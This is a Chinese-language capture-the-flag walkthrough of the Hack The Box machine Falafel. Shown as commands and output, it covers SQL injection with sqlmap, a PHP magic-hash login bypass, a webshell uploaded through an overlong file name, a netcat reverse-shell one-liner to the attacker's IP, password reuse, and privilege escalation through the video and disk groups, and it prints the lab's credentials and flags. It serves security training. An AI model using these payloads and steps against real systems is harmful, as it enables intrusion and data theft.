Falafel-htb-writeup

0x00 靶场技能介绍

章节技能：目录文件扫描、SQL注入、php弱比较漏洞、超长图片名称、数据库密码复用、video特权组、disk特权组

参考链接：https://0xdf.gitlab.io/2018/06/23/htb-falafel.html

参考链接：https://behindsecurity.com/writeups-en/tricking-php-logic-on-falafel-ctf/

0x01 用户权限获取

1、靶机介绍：

沙拉三明治难度不大，但需要一些独特的技巧和技巧才能成功利用。虽然提供了许多提示，但需要适当的枚举才能找到它们。

2、获取靶机IP地址：10.10.10.73

3、获取开放端口情况：

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=5000  -oG allports 10.10.10.73              
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 10:24 CST
Warning: 10.10.10.73 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.73
Host is up (0.36s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 26.71 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 -sC -sV --min-rate=5000 10.10.10.73 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 10:26 CST
Nmap scan report for 10.10.10.73
Host is up (0.64s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
|   256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_  256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.84 seconds

4、查看下WEB页面情况

http://10.10.10.73/

http://10.10.10.73/login.php

http://10.10.10.73/robots.txt
User-agent: *
Disallow: /*.txt

5、经过目录文件枚举发现了一个记事本信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ gobuster -u http://10.10.10.73 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html -t 30

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.73/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .txt,.php,.html
=====================================================
/images (Status: 301)
/login.php (Status: 200)
/profile.php (Status: 302)
/index.php (Status: 200)
/uploads (Status: 301)
/header.php (Status: 200)
/assets (Status: 301)
/footer.php (Status: 200)
/upload.php (Status: 302)
/css (Status: 301)
/style.php (Status: 200)
/js (Status: 301)
/logout.php (Status: 302)
/robots.txt (Status: 200)
/cyberlaw.txt (Status: 200)
/connection.php (Status: 200)
=====================================================

6、查看该笔记内容

http://10.10.10.73/cyberlaw.txt

From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***
From：Falafel Network Admin（admin@falafel.htb）Subject：URGENT！！恶意网站接管！日期：November 25，2017 3：30：58 PM PDT收件人：lawyers@falafel.htb，devs@falafel.htb交付日期：Tue，25 Nov 2017 15：31：01 -0700 Mime-Version：1.0 X-Spam-Status：score=3.7 tests=DNS_FROM_RFC_POST，HTML_00_10，HTML_MESSAGE，HTML_SHORT_LENGTH version=3.1.7 X-Spam-Level：*
A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.
一个名为“克里斯”的用户告诉我，他可以登录到我的帐户不知道密码，然后采取完全控制的网站使用图像上传功能。我们在登录表单上设置了网络保护，一位高级php开发人员负责过滤上传的URL，所以我不知道他是怎么做到的。
Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.
亲爱的律师，请处理他。我相信网络法律站在我们这边亲爱的开发人员，尽快修复这个破碎的网站。
	~admin

7、这里还是发现了一些邮箱和用户ID的信息

admin@falafel.htb
lawyers@falafel.htb
devs@falafel.htb

chris

8、经过枚举，发现登录框这里存在SQL注入漏洞

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat 1.txt    
POST /login.php HTTP/1.1
Host: 10.10.10.73
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.10.10.73
Connection: close
Referer: http://10.10.10.73/login.php
Cookie: PHPSESSID=5qmk32cp5rgg7mhfcoia4m8mk5
Upgrade-Insecure-Requests: 1

username=chris&password=chris

┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap -r login-chris.request --level 5 --risk 3 --batch --string "Wrong identification" --dump

.................
Table: users
[2 entries]
+----+--------+----------+---------------------------------------------+
| ID | role   | username | password                                    |
+----+--------+----------+---------------------------------------------+
| 1  | admin  | admin    | 0e462096931906507119562988736854            |
| 2  | normal | chris    | d4ee02a22fc872e36d9e3751ba72ddc8            |
+----+--------+----------+---------------------------------------------+
.....................

9、在数据库里发现了账号密码的哈希值，经过破解，也获取到了密码

d4ee02a22fc872e36d9e3751ba72ddc8	md5	juggling

10、使用账号密码，登录后，发现了一些提示信息

http://10.10.10.73/profile.php

11、这里其实有点类似CTF了

漏洞说明：PHP 类型转换是一种由于 PHP 中比较和类型转换行为不严格而产生的漏洞。在 PHP 中，比较不同类型的变量时，不严格的比较运算符（== 和 !=）可能会导致意外结果。例如，在比较字符串和整数时，PHP 可能会自动将字符串转换为整数进行比较。Behind Security 注意到管理员密码哈希上的前缀“0e”。

PHP 中的前缀“0e”是一种模式，在使用比较运算符（== 和 !=）进行比较时，某些数值中会出现这种模式。此前缀用于以科学计数法表示数字，其中“e”代表 10 的某个指数的幂。例如，值“0e123”被解释为“0 * 10^123”，等于 0。同样，“0e456”被解释为“0 * 10^456”，也等于 0。以下是一个易受攻击的代码示例，用于说明此漏洞。


php 类型杂耍简介
php 类型变换是指 php 尝试通过对变量类型做出假设来解决相等问题。例如，php 将尝试通过取任意初始数字并忽略其余数字来将字符串转换为数字。它还会将以字符开头的字符串视为 0，将以数字开头然后是 e 的字符串视为指数：

php > if ("3afa2c1fb515c53a3349c7f8d619abc8" == 4) { echo "equal"; } else { echo "not equal"; } // 3 != 4
not equal
php > if ("3afa2c1fb515c53a3349c7f8d619abc8" == 4) { echo "equal"; } else { echo "not equal"; } // 3 != 4
not equal
php > if ("3afa2c1fb515c53a3349c7f8d619abc8" == 3) { echo "equal"; } else { echo "not equal"; } // 3 == 3
equal
php > if ("aafa2c1fb515c53a3349c7f8d619abc8" == 0) { echo "equal"; } else { echo "not equal"; } // 0 == 0
equal

您可以使用===php 中的运算符来解决此问题：


php > if ("aafa2c1fb515c53a3349c7f8d619abc8" === 0) { echo "equal"; } else { echo "not equal"; }
not equal


玩弄管理员的密码
在思考类型杂耍的提示下，我尝试了一些方法来进入该网站。

这将起作用，因为我们已经获得了管理员密码的哈希值，并且它以,sqlmap开头。0e0e462096931906507119562988736854

上面的 Magic Hashes 参考资料为许多不同的哈希类型提供了一个字符串，这些字符串以 开头0e。尝试这些，其中md5一个，240610708登录：


重现攻击的步骤：Behind Security 搜索了一个特制的字符串，其 md5 版本以“0e”开头，并作为用户“admin”的密码提交。提交的密码是：240610708。其 md5 哈希等于：“0e462097431906509019562988736854”，PHP 将其解释为 0。它与存储的哈希“0e462096931906507119562988736854”匹配，因此身份验证成功。

12、尝试攻击利用

┌──(kali㉿offsec)-[~/Desktop]
└─$ ls -la          
总计 36
drwxr-xr-x  6 kali kali 4096  5月29日 00:24 .
drwx------ 28 kali kali 4096  5月29日 00:24 ..
-rw-r--r--  1 kali kali  602  5月28日 10:47 1.txt
-rw-r--r--  1 kali kali   33  5月29日 00:19 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png
-rw-r--r--  1 root root  334  5月28日 10:25 allports
drwxr-xr-x  2 kali kali 4096  5月28日 00:43 htb-vpn
drwxr-xr-x  3 kali kali 4096  5月28日 10:36 reports
drwxr-xr-x  4 kali kali 4096  3月29日 16:50 .svn
drwxr-xr-x 17 kali kali 4096  5月27日 06:51 tools
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.73 - - [29/May/2024 00:25:01] "GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png HTTP/1.1" 200 -


┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -vv http://10.10.10.73/uploads/0528-1121_d5f4d5f823b0c53b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php?cmd=id
*   Trying 10.10.10.73:80...
* Connected to 10.10.10.73 (10.10.10.73) port 80
> GET /uploads/0528-1121_d5f4d5f823b0c53b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php?cmd=id HTTP/1.1
> Host: 10.10.10.73
> User-Agent: curl/8.5.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 28 May 2024 08:24:48 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 54
< Content-Type: text/html; charset=UTF-8
< 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Connection #0 to host 10.10.10.73 left intact

13、开始构造反弹shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -vv http://10.10.10.73/uploads/0528-1121_d5f4d5f823b0c53b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.45%20443%20%3E%2Ftmp%2Ff
*   Trying 10.10.10.73:80...
* Connected to 10.10.10.73 (10.10.10.73) port 80
> GET /uploads/0528-1121_d5f4d5f823b0c53b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.45%20443%20%3E%2Ftmp%2Ff HTTP/1.1
> Host: 10.10.10.73
> User-Agent: curl/8.5.0
> Accept: */*
> 

14、成功获取到初始的shell环境

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443       
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.73] 49606
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

15、升级一下完整的shell环境

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ script /dev/null -c bash
<528-1121_d5f4d5f823b0c53b$ script /dev/null -c bash               
Script started, file is /dev/null
www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ ^Z
zsh: suspended  nc -lvnp 443
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 443
                              reset
reset: unknown terminal type unknown
Terminal type? screen

www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ 


www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ ls -la /home
total 16
drwxr-xr-x  4 root  root  4096 Nov 27  2017 .
drwxr-xr-x 23 root  root  4096 Nov 24  2023 ..
drwx------  4 moshe moshe 4096 Nov 24  2023 moshe
drwx------  4 yossi yossi 4096 Nov 24  2023 yossi
www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ 

16、经过枚举，发现了数据库的连接信息

www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ cd ../../
www-data@falafel:/var/www/html$ ls -la
total 92
drwxr-x--- 7 root www-data 4096 Sep 13  2022 .
drwxr-xr-x 3 root root     4096 Sep 13  2022 ..
-rwxr-xr-- 1 root www-data   41 Oct 29  2017 .htaccess
drwxr-xr-- 2 root www-data 4096 Oct 29  2017 assets
-rwxr-xr-- 1 root www-data  423 Oct 29  2017 authorized.php
-rwxr-xr-- 1 root www-data  377 Nov 28  2017 connection.php
drwxr-xr-- 2 root www-data 4096 Nov 28  2017 css
-rwxr-xr-- 1 root www-data  804 Nov 27  2017 cyberlaw.txt
-rwxr-xr-- 1 root www-data    0 Nov 27  2017 footer.php
-rwxr-xr-- 1 root www-data 1140 Nov 27  2017 header.php
-rwxr-xr-- 1 root www-data 7335 Aug 13  2015 icon.png
drwxr-xr-- 2 root www-data 4096 Nov 27  2017 images
-rwxr-xr-- 1 root www-data  818 Nov 28  2017 index.php
drwxr-xr-- 2 root www-data 4096 Nov 28  2017 js
-rwxr-xr-- 1 root www-data  752 Oct 29  2017 login.php
-rwxr-xr-- 1 root www-data 1800 Nov 28  2017 login_logic.php
-rwxr-xr-- 1 root www-data  107 Oct 29  2017 logout.php
-rwxr-xr-- 1 root www-data 1913 Nov 28  2017 profile.php
-rwxr-xr-- 1 root www-data   30 Nov 28  2017 robots.txt
-rwxr-xr-- 1 root www-data 6174 Nov 28  2017 style.php
-rwxr-xr-- 1 root www-data 3647 Nov 28  2017 upload.php
drwxrwxr-- 3 root www-data 4096 May 28 11:21 uploads
www-data@falafel:/var/www/html$ cat connection.php
<?php
   define('DB_SERVER', 'localhost:3306');
   define('DB_USERNAME', 'moshe');
   define('DB_PASSWORD', 'falafelIsReallyTasty');
   define('DB_DATABASE', 'falafel');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
   // Check connection
   if (mysqli_connect_errno())
   {
      echo "Failed to connect to MySQL: " . mysqli_connect_error();
   }
?>
www-data@falafel:/var/www/html$ 

17、该密码正好存在复用情况，使用该密码，成功SSH登录到服务器

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh moshe@10.10.10.73
The authenticity of host '10.10.10.73 (10.10.10.73)' can't be established.
ED25519 key fingerprint is SHA256:HkqcmyRF5DsZuFTcQxQ4QcKq7eG+mQMn8MX9G5RkN5s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.73' (ED25519) to the list of known hosts.
moshe@10.10.10.73's password: 
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Expanded Security Maintenance for Infrastructure is not enabled.

159 updates can be applied immediately.
51 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Nov 24 10:02:35 2023 from 10.10.14.19
$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
$

18、至此获取到第一个flag信息

$ pwd
/home/moshe
$ ls -la
total 32
drwx------ 4 moshe moshe 4096 Nov 24  2023 .
drwxr-xr-x 4 root  root  4096 Nov 27  2017 ..
lrwxrwxrwx 1 root  root     9 Sep 13  2022 .bash_history -> /dev/null
-rw-r--r-- 1 moshe moshe  220 Sep  1  2015 .bash_logout
-rw-r--r-- 1 moshe moshe 3803 Nov 27  2017 .bashrc
drwx------ 2 moshe moshe 4096 Nov 27  2017 .cache
drwx------ 3 moshe moshe 4096 Nov 24  2023 .gnupg
-rw-r--r-- 1 moshe moshe  655 May 16  2017 .profile
-r-------- 1 moshe moshe   33 May 28 05:17 user.txt
$ cat user.txt
9ee4e09cde5fa96b789f422415095c77
$ 

0x02 系统权限获取

19、在枚举时，发现了用户所在一个特殊的权限组里

$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
$ find / -type f -group video 2>/dev/null | grep -v /sys | grep -v /proc                                                                        
$ find / -type d -group video 2>/dev/null | grep -v /sys | grep -v /proc
$ find / -type f \( -name "*.sh" -o -name "*.py" -o -name "*.pl" -o -name "*.rb" -o -name "*.php" \) -group video 2>/dev/null | grep -v /sys | grep -v /proc
$ 

水平权限提升 – yossi
漏洞说明： 用户“moshe”被发现是“video”组的成员，该组授予了监控已登录用户信息的权限。进一步调查证实，用户“yossi”已登录系统并拥有有效的 tty shell。这种情况造成了潜在的安全漏洞，因为“yossi”可以滥用与“video”组相关的权限来获取对敏感数据的未经授权的访问权限并执行未经授权的操作。

漏洞修复：为了缓解此水平特权升级漏洞，系统管理员应仔细检查并限制用户的组成员身份。仅授予必要的特权，避免向用户提供过多的权限，尤其是当涉及到可以访问敏感信息的“视频”等组时。此外，定期检查和审核组成员身份以确保用户拥有执行其预期任务所需的最低权限也至关重要。

运行id验证用户“moshe”确实是“video”组的成员。
检查目标系统是否有用户“yossi”使用有效的 tty shell 登录。运行该命令ps aux应显示活动用户会话，如果“yossi”使用 tty shell，则表示存在活动登录会话。
由于“moshe”有权监控已登录用户的信息，因此攻击者可以利用此权限升级来访问 yossi 的会话。请参阅此资源以成功利用此漏洞。

20、这个/dev/fb0设备很有趣。fb0是帧缓冲区，它为视频硬件提供了一个抽象。我们可以使用cat它并获取一个文件：

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#video-group

$ pwd
/home/moshe
$ cat /dev/fb0 > screenshot.raw
$ ls -l screenshot.raw
-rw-rw-r-- 1 moshe moshe 4163040 May 28 11:41 screenshot.raw
$ 

21、要查看此文件，我们还需要屏幕分辨率，可在以下位置找到/sys/class/graphics/fb0/：

$ ls -l /sys/class/graphics/fb0/
total 0
-rw-r--r-- 1 root root 4096 May 28 11:35 bits_per_pixel
-rw-r--r-- 1 root root 4096 May 28 11:35 blank
-rw-r--r-- 1 root root 4096 May 28 11:35 bl_curve
-rw-r--r-- 1 root root 4096 May 28 11:35 console
-rw-r--r-- 1 root root 4096 May 28 11:35 cursor
-r--r--r-- 1 root root 4096 May 28 11:35 dev
lrwxrwxrwx 1 root root    0 May 28 11:42 device -> ../../../0000:00:0f.0
-rw-r--r-- 1 root root 4096 May 28 11:35 mode
-rw-r--r-- 1 root root 4096 May 28 11:35 modes
-r--r--r-- 1 root root 4096 May 28 11:35 name
-rw-r--r-- 1 root root 4096 May 28 11:35 pan
drwxr-xr-x 2 root root    0 May 28 11:35 power
-rw-r--r-- 1 root root 4096 May 28 11:35 rotate
-rw-r--r-- 1 root root 4096 May 28 11:35 state
-r--r--r-- 1 root root 4096 May 28 11:35 stride
lrwxrwxrwx 1 root root    0 May 28 11:42 subsystem -> ../../../../../class/graphics
-rw-r--r-- 1 root root 4096 May 28 05:13 uevent
-rw-r--r-- 1 root root 4096 May 28 11:35 virtual_size
$ cat /sys/class/graphics/fb0/virtual_size
1176,885
$ 

22、将其复制回kali：

falafelIsReallyTasty

echo 'falafelIsReallyTasty' | xclip; scp moshe@10.10.10.73:/home/moshe/screenshot.raw .

23、这里图片太大了，我这里传输过于慢，就省略了

24、使用上述发现的密码去登录尝试

yossi

MoshePlzStopHackingMe!

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh yossi@10.10.10.73                                                     
yossi@10.10.10.73's password: 
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Expanded Security Maintenance for Infrastructure is not enabled.

159 updates can be applied immediately.
51 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue May 28 05:13:40 2024
yossi@falafel:~$ id
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)
yossi@falafel:~$ 

漏洞说明：用户“yossi”被发现是“disk”组的成员，该组授予了重要权限。据HackTricks称，“disk”组的成员身份几乎相当于 root 访问权限，因为它允许用户访问机器内的所有数据。这种情况带来了严重的安全风险，因为“yossi”可以滥用与“disk”组相关的提升权限来访问敏感数据。

使用“ debugfs ”命令直接在设备上访问文件系统/dev/sda1。此命令允许“ yossi ”与文件系统交互并可能访问敏感文件和目录。
遍历到关键目录，例如/root。
利用此漏洞可以读取敏感文件，例如root.txt。

25、直接利用特权获取最终的flag信息

yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.44.1 (24-Mar-2018)
debugfs:  pwd
[pwd]   INODE:      2  PATH: /
[root]  INODE:      2  PATH: /
debugfs:  cd /root
debugfs:  ls
debugfs:  cat root.txt
c1ebd591494df21891eee691ca4d320d
debugfs:  

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/124